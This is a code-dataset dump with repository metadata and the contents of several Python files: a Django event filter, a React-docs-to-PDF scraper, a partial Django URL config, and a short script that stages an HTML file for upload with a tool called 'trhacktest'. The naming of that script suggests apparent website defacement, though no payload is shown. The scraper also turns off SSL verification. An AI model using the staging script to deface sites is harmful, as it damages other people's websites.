hexsha stringlengths 40 40 | size int64 7 1.04M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 247 | max_stars_repo_name stringlengths 4 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 368k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 247 | max_issues_repo_name stringlengths 4 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 247 | max_forks_repo_name stringlengths 4 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.04M | avg_line_length float64 1.77 618k | max_line_length int64 1 1.02M | alphanum_fraction float64 0 1 | original_content stringlengths 7 1.04M | filtered:remove_function_no_docstring int64 -102 942k | filtered:remove_class_no_docstring int64 -354 977k | filtered:remove_delete_markers int64 0 60.1k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e542e61606991c722a71cb4d4a6ec9c34ef5c089 | 805 | py | Python | trhacknodef.py | trhacknonimous/TRHACKNONdef | 7cf308f3058dacdf821b8a0574469b687ecc6381 | [
"Apache-2.0"
] | 1 | 2021-12-21T12:25:51.000Z | 2021-12-21T12:25:51.000Z | trhacknodef.py | trhacknonimous/TRHACKNONdef | 7cf308f3058dacdf821b8a0574469b687ecc6381 | [
"Apache-2.0"
] | null | null | null | trhacknodef.py | trhacknonimous/TRHACKNONdef | 7cf308f3058dacdf821b8a0574469b687ecc6381 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
#####DONT CHANGE THIS########
######################
### Script By TRHACKNOnimous
### www.memanon.ml
### Don't Change This.!!!
######################
import os
import sys
os.system("clear")
os.system("mkdir TRHACKNOnimous")
os.system("mv TRHACKNOnimous/ /storage/emulated/0/")
os.system("chmod +x /storage/emulated/0/TRHACKNOnimous")
os.system("cp TRHACKNONscript.html /storage/emulated/0/TRHACKNOnimous/")
print
print("tu n'as plus qu'à utiliser un outil comme trhacktest, pour uploader le script que tu viens de creer.")
os.system("sleep 5")
print("script créé dans : /storage/emulated/0/TRHACKNOnimous/TRHACKNONscript.html")
os.system("sleep 2")
print("dont forget anonymous see everythink ;-)")
os.system("sleep 3")
print("[ Script en cours de chargement ]")
| 33.541667 | 109 | 0.68323 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#####DONT CHANGE THIS########
######################
### Script By TRHACKNOnimous
### www.memanon.ml
### Don't Change This.!!!
######################
import os
import sys
os.system("clear")
os.system("mkdir TRHACKNOnimous")
os.system("mv TRHACKNOnimous/ /storage/emulated/0/")
os.system("chmod +x /storage/emulated/0/TRHACKNOnimous")
os.system("cp TRHACKNONscript.html /storage/emulated/0/TRHACKNOnimous/")
print
print("tu n'as plus qu'à utiliser un outil comme trhacktest, pour uploader le script que tu viens de creer.")
os.system("sleep 5")
print("script créé dans : /storage/emulated/0/TRHACKNOnimous/TRHACKNONscript.html")
os.system("sleep 2")
print("dont forget anonymous see everythink ;-)")
os.system("sleep 3")
print("[ Script en cours de chargement ]")
| 0 | 0 | 0 |
be769643795a56f48c986114bc2501c3e0c90c43 | 1,024 | py | Python | events/filters.py | Lord-sarcastic/canonical-interview | 5bf208bd1d11114aa69df7d15e5f2606edaacf29 | [
"MIT"
] | null | null | null | events/filters.py | Lord-sarcastic/canonical-interview | 5bf208bd1d11114aa69df7d15e5f2606edaacf29 | [
"MIT"
] | null | null | null | events/filters.py | Lord-sarcastic/canonical-interview | 5bf208bd1d11114aa69df7d15e5f2606edaacf29 | [
"MIT"
] | null | null | null | from django_filters import rest_framework as filters
from .models import Event
| 34.133333 | 87 | 0.670898 | from django_filters import rest_framework as filters
from .models import Event
class EventFilter(filters.FilterSet):
log_level = filters.ChoiceFilter(
field_name="log_level", choices=Event.LogLevel.choices
)
service_id = filters.CharFilter(field_name="service_id", lookup_expr="icontains")
instance_id = filters.CharFilter(field_name="instance_id", lookup_expr="icontains")
request_id = filters.CharFilter(field_name="request_id", lookup_expr="icontains")
event_action = filters.ChoiceFilter(
field_name="event_action`", choices=Event.Actions.choices
)
timestamp_gt = filters.DateTimeFilter(field_name="timestamp", lookup_expr="gt")
timestamp_lt = filters.DateTimeFilter(field_name="timestamp", lookup_expr="lt")
class Meta:
model = Event
fields = [
"log_level",
"service_id",
"instance_id",
"request_id",
"event_action",
"timestamp_gt",
"timestamp_lt",
]
| 0 | 920 | 23 |
f7bc2a4817d97549ce1f456ae9e4053631da76ca | 4,437 | py | Python | src/convert.py | Yacent/ReactTutorialInPDF | 19ce923f883ddb329f7c8bfa53f60513631b9a6a | [
"MIT"
] | null | null | null | src/convert.py | Yacent/ReactTutorialInPDF | 19ce923f883ddb329f7c8bfa53f60513631b9a6a | [
"MIT"
] | null | null | null | src/convert.py | Yacent/ReactTutorialInPDF | 19ce923f883ddb329f7c8bfa53f60513631b9a6a | [
"MIT"
] | null | null | null | # coding=utf-8
# 实现主要思路
# 1. 获取网页教程的内容
# 2. 获取主页当中的ul-list
# 3. 根据获取的ul-list 当中的a 不断发送请求,获取数据,并写入
import os
import logging
import requests
import pickle
from weasyprint import HTML
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
# global variable
INDEX_URL = 'https://facebook.github.io/react/docs/getting-started.html'
BASE_URL = 'https://facebook.github.io'
TRY_LIMITED = 5
# 配置日志模块,并且输出到屏幕和文件
logger = logging.getLogger('pdf_logger')
logger.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %('
'message)s')
fh = logging.FileHandler('../log/pdf.log')
sh = logging.StreamHandler()
fh.setFormatter(formatter)
sh.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(sh)
# 配置浏览器选项,提高抓取速度
cap = dict(DesiredCapabilities.PHANTOMJS)
cap['phantomjs.page.settings.loadImages'] = False # 禁止加载图片
cap['phantomjs.page.settings.userAgent'] = ('Mozilla/5.0 (Windows NT 10.0; '
'WOW64) AppleWebKit/537.36 ('
'KHTML, like Gecko) '
'Chrome/45.0.2454.101 '
'Safari/537.36') # 设置useragent
cap['phantomjs.page.settings.diskCache'] = True # 设置浏览器开启缓存
# service_args = [
# '--proxy=127.0.0.1:1080',
# '--proxy-type=socks5',
# ]
# 设置忽略https
service_args=['--ignore-ssl-errors=true',
'--ssl-protocol=any',
'--proxy=127.0.0.1:1080',
'--proxy-type=socks5']
browser = webdriver.PhantomJS(desired_capabilities=cap, service_args=service_args)
browser.set_page_load_timeout(180) # 超时时间
def fetch_url_list():
"""
从react官网教程主页当中抓取页面的URL 列表
:return: 获取到的ul-list当中的所有li
"""
try:
page = requests.get(INDEX_URL, verify=True)
content = page.text
soup = BeautifulSoup(content, 'lxml')
url_list = [item['href'] for item in soup.select('.nav-docs-section ul li a')
if item['href'].find('https') == -1]
return url_list
except Exception as e:
logger.error('fetch url list failed')
logger.error(e)
def fetch_page(url, index):
"""
根据给定的URL抓取页面 即url_list当中的
:param url:要抓取页面的地址
:param index:页面地址在url_list当中的位置,调式时使用,方便查看哪个出错
:return:返回抓到页面的源代码,失败则返回none
"""
try:
browser.get(url)
return browser.page_source
except Exception as e:
logger.warning('get page %d %s failed' % (index, url))
logger.warning(e)
return None
def build_content():
"""
处理每一个url当中爬到页面,按顺序写入到文件当中
:return: None
"""
url_list = fetch_url_list()
print(url_list)
output = []
logger.info('there are %s pages' % len(url_list))
for url_index in range(len(url_list)):
# 爬页面时可能会因为网络等原因而失败,失败后可以尝试重新抓取,最多五次
try_count = 0
temp = BASE_URL + url_list[url_index]
html = fetch_page(temp, url_index)
while try_count < TRY_LIMITED and html is None:
html = fetch_page(BASE_URL + url_list[url_index], url_index)
try_count += 1
try:
if html is not None:
soup = BeautifulSoup(html, 'lxml')
title = soup.select(".inner-content")[0]
output.append(str(title))
logger.info('get page %s success' % url_index)
# 页面抓取比较耗时,且中途失败的几率较大,每抓取到页面可以把迄今为止的结果
# 序列化存储,程序异常退出后前面的结果不会丢失,可以反序列化后接着使用
# with open('output.dump', 'wb') as f:
# pickle.dump(output, f)
except Exception as e:
logger.warning('deal page %s %s failed' % (url_index,
url_list[url_index]))
logger.warning(e)
with open('../html/pages.html', 'w') as f:
f.write('<head><meta charset="utf-8"/></head><body>' + ''.join(
output) + '</body>')
if not os.path.exists('../html/pages.html'):
build_content()
if browser:
browser.quit()
css = [
'../css/codemirror.css',
'../css/react.css',
'../css/syntax.css'
]
HTML('../html/pages.html').write_pdf('../React教程.pdf', stylesheets=css)
| 31.920863 | 86 | 0.57922 | # coding=utf-8
# 实现主要思路
# 1. 获取网页教程的内容
# 2. 获取主页当中的ul-list
# 3. 根据获取的ul-list 当中的a 不断发送请求,获取数据,并写入
import os
import logging
import requests
import pickle
from weasyprint import HTML
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
# global variable
INDEX_URL = 'https://facebook.github.io/react/docs/getting-started.html'
BASE_URL = 'https://facebook.github.io'
TRY_LIMITED = 5
# 配置日志模块,并且输出到屏幕和文件
logger = logging.getLogger('pdf_logger')
logger.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %('
'message)s')
fh = logging.FileHandler('../log/pdf.log')
sh = logging.StreamHandler()
fh.setFormatter(formatter)
sh.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(sh)
# 配置浏览器选项,提高抓取速度
cap = dict(DesiredCapabilities.PHANTOMJS)
cap['phantomjs.page.settings.loadImages'] = False # 禁止加载图片
cap['phantomjs.page.settings.userAgent'] = ('Mozilla/5.0 (Windows NT 10.0; '
'WOW64) AppleWebKit/537.36 ('
'KHTML, like Gecko) '
'Chrome/45.0.2454.101 '
'Safari/537.36') # 设置useragent
cap['phantomjs.page.settings.diskCache'] = True # 设置浏览器开启缓存
# service_args = [
# '--proxy=127.0.0.1:1080',
# '--proxy-type=socks5',
# ]
# 设置忽略https
service_args=['--ignore-ssl-errors=true',
'--ssl-protocol=any',
'--proxy=127.0.0.1:1080',
'--proxy-type=socks5']
browser = webdriver.PhantomJS(desired_capabilities=cap, service_args=service_args)
browser.set_page_load_timeout(180) # 超时时间
def fetch_url_list():
"""
从react官网教程主页当中抓取页面的URL 列表
:return: 获取到的ul-list当中的所有li
"""
try:
page = requests.get(INDEX_URL, verify=True)
content = page.text
soup = BeautifulSoup(content, 'lxml')
url_list = [item['href'] for item in soup.select('.nav-docs-section ul li a')
if item['href'].find('https') == -1]
return url_list
except Exception as e:
logger.error('fetch url list failed')
logger.error(e)
def fetch_page(url, index):
"""
根据给定的URL抓取页面 即url_list当中的
:param url:要抓取页面的地址
:param index:页面地址在url_list当中的位置,调式时使用,方便查看哪个出错
:return:返回抓到页面的源代码,失败则返回none
"""
try:
browser.get(url)
return browser.page_source
except Exception as e:
logger.warning('get page %d %s failed' % (index, url))
logger.warning(e)
return None
def build_content():
"""
处理每一个url当中爬到页面,按顺序写入到文件当中
:return: None
"""
url_list = fetch_url_list()
print(url_list)
output = []
logger.info('there are %s pages' % len(url_list))
for url_index in range(len(url_list)):
# 爬页面时可能会因为网络等原因而失败,失败后可以尝试重新抓取,最多五次
try_count = 0
temp = BASE_URL + url_list[url_index]
html = fetch_page(temp, url_index)
while try_count < TRY_LIMITED and html is None:
html = fetch_page(BASE_URL + url_list[url_index], url_index)
try_count += 1
try:
if html is not None:
soup = BeautifulSoup(html, 'lxml')
title = soup.select(".inner-content")[0]
output.append(str(title))
logger.info('get page %s success' % url_index)
# 页面抓取比较耗时,且中途失败的几率较大,每抓取到页面可以把迄今为止的结果
# 序列化存储,程序异常退出后前面的结果不会丢失,可以反序列化后接着使用
# with open('output.dump', 'wb') as f:
# pickle.dump(output, f)
except Exception as e:
logger.warning('deal page %s %s failed' % (url_index,
url_list[url_index]))
logger.warning(e)
with open('../html/pages.html', 'w') as f:
f.write('<head><meta charset="utf-8"/></head><body>' + ''.join(
output) + '</body>')
if not os.path.exists('../html/pages.html'):
build_content()
if browser:
browser.quit()
css = [
'../css/codemirror.css',
'../css/react.css',
'../css/syntax.css'
]
HTML('../html/pages.html').write_pdf('../React教程.pdf', stylesheets=css)
| 0 | 0 | 0 |
41653f40b4621c9f3cf7ce3238a9ba6174580176 | 11,348 | py | Python | dynadb/urls.py | GPCRmd/GPCRmd | 7dc75359ace4a00c1597bdb7a86ebee17d51f09c | [
"Apache-2.0"
] | 3 | 2019-03-06T13:35:38.000Z | 2020-08-05T15:31:29.000Z | dynadb/urls.py | GPCRmd/GPCRmd | 7dc75359ace4a00c1597bdb7a86ebee17d51f09c | [
"Apache-2.0"
] | null | null | null | dynadb/urls.py | GPCRmd/GPCRmd | 7dc75359ace4a00c1597bdb7a86ebee17d51f09c | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from django.conf.urls import url,patterns,include #antes: from django.conf.urls import url,patterns
from django.views.generic import TemplateView
from django.contrib import admin
from django.conf import settings
from . import views
from haystack.query import SearchQuerySet
from haystack.views import SearchView
from .forms import MainSearchForm
sqs = SearchQuerySet().all()
app_name= 'dynadb'
urlpatterns = [
url(r'^reset/$', views.reset_permissions, name="reset_permissions"),
#url(r'^prueba_varios/$', TemplateView.as_view(template_name='dynadb/pruebamult_template.html'), name="prueba_varios"),
#url(r'^profile_setting/$', views.profile_setting, name='profile_setting'),
#url(r'^sub_sim/$', views.sub_sim, name='sub_sim'),
#url(r'^name/$', views.get_name, name='name'),
# url(r'^dyndbfiles/$', views.get_DyndbFiles, name='dyndbfiles'),
url(r'^db_inputform/(?P<submission_id>[0-9]+)?/?$', views.db_inputformMAIN, name='db_inputform'),
url(r'^before_db_inputform_prev_moddb_inputform/(?P<submission_id>[0-9]+)?/?$', views.db_inputformMAIN, name='before_db_inputform_prev_mod'),
# url(r'^db_author_information/$', views.get_Author_Information, name='db_author_information'),
# url(r'^db_dynamics/$', views.get_Dynamics, name='db_dynamics'),
# url(r'^db_files/$', views.get_FilesCOMPLETE, name='db_files'),
# url(r'^db_protein/$', views.get_ProteinForm, name='db_protein'),
# url(r'^db_molecule/$', views.get_Molecule, name='db_molecule'),
# url(r'^db_molecule/$', views.get_Molecule, name='db_molecule'),
# url(r'^db_component/$', views.get_Component, name='db_component'),
# url(r'^db_model/$', views.get_Model, name='db_model'),
# url(r'^db_compoundform/$', views.get_CompoundForm, name='db_compoundform'),
# url(r'^your_name/$', views.get_name, name='your_name'),
# url(r'^thanks/$', views.get_name, name='thanks'),
# url(r'^admin/', admin.site.urls),
url(r'^protein/(?P<submission_id>[0-9]+)/$', views.PROTEINview, name='protein'),
url(r'^protein/(?P<submission_id>[0-9]+)/delete/$', views.delete_protein, name='delete_protein'),
url(r'^protein/get_data_upkb/?([A-Z0-9-]+)?$', views.protein_get_data_upkb, name='protein_get_data_upkb'),
url(r'^protein/download_specieslist/$', views.download_specieslist, name='protein_download_specieslist'),
url(r'^protein/get_specieslist/$', views.get_specieslist, name='protein_get_specieslist'),
url(r'^protein/get_mutations/$', views.get_mutations_view, name='protein_get_mutations'),
url(r'^protein/(?P<alignment_key>[0-9]+)/alignment/$', views.show_alig, name='show_alig'),
url(r'^protein/id/(?P<protein_id>[0-9]+)/$',views.query_protein, name='query_protein'),
url(r'^protein/id/(?P<protein_id>[0-9]+)/fasta$',views.query_protein_fasta, name='query_protein_fasta'),
url(r'^molecule/id/(?P<molecule_id>[0-9]+)/$',views.query_molecule, name='query_molecule'),
url(r'^molecule/id/(?P<molecule_id>[0-9]+)/sdf$',views.query_molecule_sdf,name='query_molecule_sdf'),
url(r'^compound/id/(?P<compound_id>[0-9]+)/$',views.query_compound, name='query_compound'),
url(r'^model/id/(?P<model_id>[0-9]+)/$',views.query_model, name='query_model'),
url(r'^dynamics/id/(?P<dynamics_id>[0-9]+)/$',views.query_dynamics, name='query_dynamics'),
url(r'^complex/id/(?P<complex_id>[0-9]+)/$',views.query_complex, name='query_complex'),
url(r'^references/$', views.REFERENCEview, name='references'),
url(r'^REFERENCEfilled/(?P<submission_id>[0-9]+)/$', views.REFERENCEview, name='REFERENCEfilled'),
url(r'^PROTEINfilled/(?P<submission_id>[0-9]+)/$', views.PROTEINview, name='PROTEINfilled'),
url(r'^submission_summary/(?P<submission_id>[0-9]+)/$', views.submission_summaryiew, name='submission_summary'),
url(r'^protein_summary/(?P<submission_id>[0-9]+)/$', views.protein_summaryiew, name='protein_summary'),
url(r'^molecule_summary/(?P<submission_id>[0-9]+)/$', views.molecule_summaryiew, name='molecule_summary'),
url(r'^model_summary/(?P<submission_id>[0-9]+)/$', views.model_summaryiew, name='model_summary'),
url(r'^molecule/(?P<submission_id>[0-9]+)/$', views.SMALL_MOLECULEview, name='molecule'),
url(r'^molecule/(?P<submission_id>[0-9]+)/delete/$', views.delete_molecule, name='delete_molecule'),
url(r'^moleculereuse/(?P<submission_id>[0-9]+)/(?P<model_id>[0-9]+)/$', views.SMALL_MOLECULEreuseview, name='moleculereuse'),
url(r'^moleculereuse/(?P<submission_id>[0-9]+)/(?:[0-9]+/)?generate_properties/$', views.generate_molecule_properties, name='generate_molecule_properties_reuse'),
url(r'^moleculereuse/(?P<submission_id>[0-9]+)/(?:[0-9]+/)?delete/$', views.delete_molecule, name='delete_molecule_reuse'),
url(r'^moleculereuse/(?P<submission_id>[0-9]+)/(?:[0-9]+/)?get_compound_info_pubchem/$', views.get_compound_info_pubchem, name='get_compound_info_pubchem_reuse'),
url(r'^moleculereuse/(?P<submission_id>[0-9]+)/(?:[0-9]+/)?get_compound_info_chembl/$', views.get_compound_info_chembl, name='get_compound_info_chembl_reuse'),
url(r'^moleculereuse/(?P<submission_id>[0-9]+)/(?:[0-9]+/)?submitpost/$', views.submitpost_view, name='submitpost_reuse'),
#url(r'^moleculereuse/open_pubchem/$', views.open_pubchem, name='molecule_open_pubchem_reuse'),
#url(r'^moleculereuse/open_chembl/$', views.open_chembl, name='molecule_open_chembl_reuse'),
url(r'^moleculereuse/(?:[0-9]+/)open_pubchem/$', views.open_pubchem, name='molecule_open_pubchem_reuse'),
url(r'^moleculereuse/(?:[0-9]+/)open_chembl/$', views.open_chembl, name='molecule_open_chembl_reuse'),
url(r'^molecule/(?P<submission_id>[0-9]+)/submitpost/$', views.submitpost_view, name='submitpost'),
url(r'^molecule/(?P<submission_id>[0-9]+)/generate_properties/$', views.generate_molecule_properties, name='generate_molecule_properties'),
url(r'^molecule/(?P<submission_id>[0-9]+)/get_compound_info_pubchem/$', views.get_compound_info_pubchem, name='get_compound_info_pubchem'),
url(r'^molecule/(?P<submission_id>[0-9]+)/get_compound_info_chembl/$', views.get_compound_info_chembl, name='get_compound_info_chembl'),
url(r'^molecule/open_pubchem/$', views.open_pubchem, name='molecule_open_pubchem'),
url(r'^molecule/open_chembl/$', views.open_chembl, name='molecule_open_chembl'),
url(r'^molecule2/(?P<submission_id>[0-9]+)/$', views.SMALL_MOLECULEview2, name='molecule2'),
url(r'^MOLECULEfilled/(?P<submission_id>[0-9]+)/$', views.SMALL_MOLECULEview, name='MOLECULEfilled'),
url(r'^MOLECULEfilled2/$', views.SMALL_MOLECULEview2, name='MOLECULEfilled2'),
url(r'^model/(?P<submission_id>[0-9]+)/$', views.MODELview, name='model'),
url(r'^(?P<form_type>model|dynamics)/(?P<submission_id>[0-9]+)/check_pdb_molecules/$', views.pdbcheck_molecule, name='pdbcheck_molecule'),
url(r'^(?P<form_type>dynamics)reuse/(?P<submission_id>[0-9]+)/(?:[0-9]+/)?check_pdb_molecules/$', views.pdbcheck_molecule, name='pdbcheck_molecule'), #######
url(r'^(?P<form_type>model|dynamics)/(?P<submission_id>[0-9]+)/get_submission_molecule_info/$', views.get_submission_molecule_info, name='get_submission_molecule_info'),
url(r'^model/(?P<submission_id>[0-9]+)/ajax_pdbchecker/$', views.pdbcheck, name='pdbcheck'),
url(r'^model/(?P<submission_id>[0-9]+)/search_top/$',views.search_top,name='search_top'), #keep this one in a merge
url(r'^model/(?P<submission_id>[0-9]+)/upload_model_pdb/$', views.upload_model_pdb, name='upload_model_pdb'),
url(r'^modelreuse/(?P<submission_id>-?[0-9]+)/(?:[0-9]+/)?$', views.MODELreuseview, name='modelreuse'),
url(r'^proteinreuse/(?P<submission_id>[0-9]+)/(?:[0-9]+/)?$', views.PROTEINreuseview, name='proteinreuse'),
# url(r'^moleculereuse/(?P<submission_id>[0-9]+)/(?P<model_id>[0-9]+)/$', views.SMALL_MOLECULEreuseview, name='moleculereuse'),
# url(r'^modelrow/$', views.MODELrowview, name='modelrow'),
url(r'^modelreuserequest/(?P<model_id>[0-9]+)/$', views.MODELreuseREQUESTview, name='modelreuserequest'),
url(r'^MODELfilled/(?P<submission_id>[0-9]+)/$', views.MODELview, name='MODELfilled'),
#url(r'^ajax_pdbchecker/(?P<submission_id>[0-9]+)/$', views.pdbcheck, name='pdbcheck'),
url(r'^search/$', SearchView(template='/protwis/sites/protwis/dynadb/templates/search/search.html', searchqueryset=sqs, form_class=MainSearchForm),name='haystack_search'),
url(r'^ajaxsearch/',views.ajaxsearcher,name='ajaxsearcher'),
url(r'^empty_search/',views.emptysearcher,name='emptysearcher'),
url(r'^autocomplete/',views.autocomplete,name='autocomplete'),
url(r'^advanced_search/$', views.NiceSearcher,name='NiceSearcher'),
#url(r'^search_top/(?P<submission_id>[0-9]+)/$',views.search_top,name='search_top'),
url(r'^dynamics/(?P<submission_id>[0-9]+)/$', views.DYNAMICSview, name='dynamics'),
url(r'^dynamics/(?P<submission_id>[0-9]+)/(?:[0-9]+/)?upload_files/((?P<trajectory>traj)/)?$', views.upload_dynamics_files, name='dynamics_upload_files'),
url(r'^dynamicsreuse/(?P<submission_id>[0-9]+)/(?:[0-9]+/)?upload_files/((?P<trajectory>traj)/)?$', views.upload_dynamics_files, name='dynamics_upload_files'),
url(r'^dynamics/(?P<submission_id>[0-9]+)/check_trajectories/$', views.check_trajectories, name='dynamics_check_trajectories'),
url(r'^dynamics/do_analysis/$', views.do_analysis, name='do_analysis'),
# url(r'^dynamicsreuse/(?P<submission_id>[0-9]+)/(?P<model_id>[0-9]+)/$', views.DYNAMICSreuseview, name='dynamicsreuse'),
url(r'^dynamicsreuse/(?P<submission_id>[0-9]+)/(?P<model_id>[0-9]+)/$', views.DYNAMICSview, name='dynamicsreuse'),
url(r'^DYNAMICSfilled/(?P<submission_id>[0-9]+)/$', views.DYNAMICSview, name='DYNAMICSfilled'),
#url(r'^form/$', views.get_formup, name='form'),
url(r'^model/carousel/(?P<model_id>[0-9]+)/$', views.carousel_model_components, name='carousel_model_components'),
url(r'^dynamics/carousel/(?P<dynamics_id>[0-9]+)/$', views.carousel_dynamics_components, name='carousel_dynamics_components'),
#url(r'^files/(?P<path>.*)$', 'django.views.static.serve', {'document_root': settings.MEDIA_ROOT,}), #this line shouldnt be here
url(r'^submitted/(?P<submission_id>[0-9]+)/$', views.SUBMITTEDview, name='submitted'),
url(r'^close_submission/(?P<submission_id>[0-9]+)/$', views.close_submission, name='close_submission'),
url(r'^datasets/$', views.datasets, name='datasets'),
url(r'^table/$', views.table, name='table'),
url(r'^blank/$', TemplateView.as_view(template_name="dynadb/blank.html"), name='blank'),]
# url(r'^some_temp/$', views.some_view, name='some_temp')
# url(r'^prueba_varios/$', views.profile_setting, name='PRUEBA_varios'),
if settings.DEBUG:
urlpatterns += patterns('',
url(r'^files/(?P<path>.*)$', 'django.views.static.serve', {
'document_root': settings.MEDIA_ROOT,
}),
url(r'^static/(?P<path>.*)$', 'django.views.static.serve', {
'document_root': settings.STATIC_ROOT,
}),
)
else:
if settings.FILES_NO_LOGIN:
serve_files_func = views.serve_submission_files_no_login
else:
serve_files_func = views.serve_submission_files
urlpatterns += patterns('',
url(r'^files/(?P<obj_folder>[^/\\]+)/(?P<submission_folder>[^/\\]+)/(?P<path>.*)$', serve_files_func, name='serve_submission_files'),
)
| 79.915493 | 175 | 0.700211 | # -*- coding: utf-8 -*-
from django.conf.urls import url,patterns,include #antes: from django.conf.urls import url,patterns
from django.views.generic import TemplateView
from django.contrib import admin
from django.conf import settings
from . import views
from haystack.query import SearchQuerySet
from haystack.views import SearchView
from .forms import MainSearchForm
sqs = SearchQuerySet().all()
app_name= 'dynadb'
urlpatterns = [
url(r'^reset/$', views.reset_permissions, name="reset_permissions"),
#url(r'^prueba_varios/$', TemplateView.as_view(template_name='dynadb/pruebamult_template.html'), name="prueba_varios"),
#url(r'^profile_setting/$', views.profile_setting, name='profile_setting'),
#url(r'^sub_sim/$', views.sub_sim, name='sub_sim'),
#url(r'^name/$', views.get_name, name='name'),
# url(r'^dyndbfiles/$', views.get_DyndbFiles, name='dyndbfiles'),
url(r'^db_inputform/(?P<submission_id>[0-9]+)?/?$', views.db_inputformMAIN, name='db_inputform'),
url(r'^before_db_inputform_prev_moddb_inputform/(?P<submission_id>[0-9]+)?/?$', views.db_inputformMAIN, name='before_db_inputform_prev_mod'),
# url(r'^db_author_information/$', views.get_Author_Information, name='db_author_information'),
# url(r'^db_dynamics/$', views.get_Dynamics, name='db_dynamics'),
# url(r'^db_files/$', views.get_FilesCOMPLETE, name='db_files'),
# url(r'^db_protein/$', views.get_ProteinForm, name='db_protein'),
# url(r'^db_molecule/$', views.get_Molecule, name='db_molecule'),
# url(r'^db_molecule/$', views.get_Molecule, name='db_molecule'),
# url(r'^db_component/$', views.get_Component, name='db_component'),
# url(r'^db_model/$', views.get_Model, name='db_model'),
# url(r'^db_compoundform/$', views.get_CompoundForm, name='db_compoundform'),
# url(r'^your_name/$', views.get_name, name='your_name'),
# url(r'^thanks/$', views.get_name, name='thanks'),
# url(r'^admin/', admin.site.urls),
url(r'^protein/(?P<submission_id>[0-9]+)/$', views.PROTEINview, name='protein'),
url(r'^protein/(?P<submission_id>[0-9]+)/delete/$', views.delete_protein, name='delete_protein'),
url(r'^protein/get_data_upkb/?([A-Z0-9-]+)?$', views.protein_get_data_upkb, name='protein_get_data_upkb'),
url(r'^protein/download_specieslist/$', views.download_specieslist, name='protein_download_specieslist'),
url(r'^protein/get_specieslist/$', views.get_specieslist, name='protein_get_specieslist'),
url(r'^protein/get_mutations/$', views.get_mutations_view, name='protein_get_mutations'),
url(r'^protein/(?P<alignment_key>[0-9]+)/alignment/$', views.show_alig, name='show_alig'),
url(r'^protein/id/(?P<protein_id>[0-9]+)/$',views.query_protein, name='query_protein'),
url(r'^protein/id/(?P<protein_id>[0-9]+)/fasta$',views.query_protein_fasta, name='query_protein_fasta'),
url(r'^molecule/id/(?P<molecule_id>[0-9]+)/$',views.query_molecule, name='query_molecule'),
url(r'^molecule/id/(?P<molecule_id>[0-9]+)/sdf$',views.query_molecule_sdf,name='query_molecule_sdf'),
url(r'^compound/id/(?P<compound_id>[0-9]+)/$',views.query_compound, name='query_compound'),
url(r'^model/id/(?P<model_id>[0-9]+)/$',views.query_model, name='query_model'),
url(r'^dynamics/id/(?P<dynamics_id>[0-9]+)/$',views.query_dynamics, name='query_dynamics'),
url(r'^complex/id/(?P<complex_id>[0-9]+)/$',views.query_complex, name='query_complex'),
url(r'^references/$', views.REFERENCEview, name='references'),
url(r'^REFERENCEfilled/(?P<submission_id>[0-9]+)/$', views.REFERENCEview, name='REFERENCEfilled'),
url(r'^PROTEINfilled/(?P<submission_id>[0-9]+)/$', views.PROTEINview, name='PROTEINfilled'),
url(r'^submission_summary/(?P<submission_id>[0-9]+)/$', views.submission_summaryiew, name='submission_summary'),
url(r'^protein_summary/(?P<submission_id>[0-9]+)/$', views.protein_summaryiew, name='protein_summary'),
url(r'^molecule_summary/(?P<submission_id>[0-9]+)/$', views.molecule_summaryiew, name='molecule_summary'),
url(r'^model_summary/(?P<submission_id>[0-9]+)/$', views.model_summaryiew, name='model_summary'),
url(r'^molecule/(?P<submission_id>[0-9]+)/$', views.SMALL_MOLECULEview, name='molecule'),
url(r'^molecule/(?P<submission_id>[0-9]+)/delete/$', views.delete_molecule, name='delete_molecule'),
url(r'^moleculereuse/(?P<submission_id>[0-9]+)/(?P<model_id>[0-9]+)/$', views.SMALL_MOLECULEreuseview, name='moleculereuse'),
url(r'^moleculereuse/(?P<submission_id>[0-9]+)/(?:[0-9]+/)?generate_properties/$', views.generate_molecule_properties, name='generate_molecule_properties_reuse'),
url(r'^moleculereuse/(?P<submission_id>[0-9]+)/(?:[0-9]+/)?delete/$', views.delete_molecule, name='delete_molecule_reuse'),
url(r'^moleculereuse/(?P<submission_id>[0-9]+)/(?:[0-9]+/)?get_compound_info_pubchem/$', views.get_compound_info_pubchem, name='get_compound_info_pubchem_reuse'),
url(r'^moleculereuse/(?P<submission_id>[0-9]+)/(?:[0-9]+/)?get_compound_info_chembl/$', views.get_compound_info_chembl, name='get_compound_info_chembl_reuse'),
url(r'^moleculereuse/(?P<submission_id>[0-9]+)/(?:[0-9]+/)?submitpost/$', views.submitpost_view, name='submitpost_reuse'),
#url(r'^moleculereuse/open_pubchem/$', views.open_pubchem, name='molecule_open_pubchem_reuse'),
#url(r'^moleculereuse/open_chembl/$', views.open_chembl, name='molecule_open_chembl_reuse'),
